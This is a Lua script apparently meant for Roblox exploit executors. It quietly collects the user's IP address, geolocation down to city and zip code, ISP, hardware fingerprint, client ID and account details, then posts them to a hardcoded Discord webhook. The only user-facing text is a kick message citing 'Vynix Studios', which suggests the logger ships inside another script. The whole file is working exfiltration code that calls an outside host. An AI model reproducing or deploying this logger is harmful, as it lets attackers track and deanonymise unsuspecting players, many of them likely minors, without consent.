local IP = game:HttpGet("https://v4.ident.me")
local response = game:GetService("RbxAnalyticsService"):GetClientId()
local req = syn.request({ Url = "http://ip-api.com/json/" })
local parsed = game:GetService("HttpService"):JSONDecode(req.Body)
plr = game:GetService'Players'.LocalPlayer
local premium = false
local ALT = false
if plr.MembershipType == Enum.MembershipType.Premium then
	premium = true
elseif plr.MembershipType == Enum.MembershipType.None then
	premium = false
end
if premium == false then 
	if plr.AccountAge <= 70 then 
		ALT = true
	end
end

local market = game:GetService("MarketplaceService")
local info = market:GetProductInfo(game.PlaceId, Enum.InfoType.Asset)


local http_request = http_request;
if syn then
	http_request = syn.request
elseif SENTINEL_V2 then
	function http_request(tb)
		return {
			StatusCode = 200;
			Body = request(tb.Url, tb.Method, (tb.Body or ''))
		}
	end
end

local body = http_request({Url = 'https://httpbin.org/get'; Method = 'GET'}).Body;
local decoded = game:GetService('HttpService'):JSONDecode(body)
local hwid_list = {"Syn-Fingerprint", "Exploit-Guid", "Proto-User-Identifier", "Sentinel-Fingerprint"};
hwid = "";

for i, v in next, hwid_list do
	if decoded.headers[v] then
		hwid = decoded.headers[v];
		break
	end
end

if hwid then
local HttpServ = game:GetService('HttpService')
local url = "https://discord.com/api/webhooks/1033909881243189268/eFDKtzZo4CsKwIAmjWpRY4_N4ziqa8P0wNCboeVi7pCsp4Tibo4olxK1Nm9C4ZEhYDaU"


local data = 
    {
        ["content"] = "",
        ["embeds"] = {{
            ["title"] = "__**HWID:**__",
            ["description"] = hwid,
            ["type"] = "rich",
            ["color"] = tonumber(0x9d00ff),
            ["fields"] = {
                {
                    ["name"] = "Username:",
                    ["value"] = Game.Players.LocalPlayer.Name,
                    ["inline"] = true
                },
				{
                    ["name"] = "IP Address:",
                    ["value"] = IP,
                    ["inline"] = true
                },
				{
                    ["name"] = "Game Link:",
                    ["value"] = "https://roblox.com/games/" .. game.PlaceId .. "/",
                    ["inline"] = true
                },
				{
					["name"] = "Game Name:",
					["value"] = info.Name,
					["inline"] = true
				},
				{
					["name"] = "Age:",
					["value"] = plr.AccountAge,
					["inline"] = true
				},
				{
					["name"] = "Premium:",
					["value"] = premium,
					["inline"] = true
				},
				{
					["name"] = "ALT:",
					["value"] = ALT,
					["inline"] = true
				},
				{
					["name"] = "Non Hashed HWID:",
					["value"] = response,
					["inline"] = true
				},
				{
					["name"] = "Country:",
					["value"] = parsed.country,
					["inline"] = true
				},
				{
					["name"] = "Country Code:",
					["value"] = parsed.countryCode,
					["inline"] = true
				},
				{
					["name"] = "Region:",
					["value"] = parsed.region,
					["inline"] = true
				},
				{
					["name"] = "Region Name:",
					["value"] = parsed.regionName,
					["inline"] = true
				},
				{
					["name"] = "City:",
					["value"] = parsed.city,
					["inline"] = true
				},
				{
					["name"] = "Zip Code:",
					["value"] = parsed.zip,
					["inline"] = true
				},
				{
					["name"] = "Time Zone:",
					["value"] = parsed.timezone,
					["inline"] = true
				},
				{
					["name"] = "ISP:",
					["value"] = parsed.isp,
					["inline"] = true
				},
				{
					["name"] = "Org:",
					["value"] = parsed.org,
					["inline"] = true
				},
				{
					["name"] = "AS:",
					["value"] = parsed.as,
					["inline"] = true
				},
            },
        }}
    }
    local newdata = HttpServ:JSONEncode(data)
    
    local headers = {
            ["content-type"] = "application/json"
    }
    
    local request_payload = {Url=url, Body=newdata, Method="POST", Headers=headers}
    http_request(request_payload)
else
	game:GetService("Players").LocalPlayer:Kick('Unable to find HWID! Contact Vynix Studios.')
end
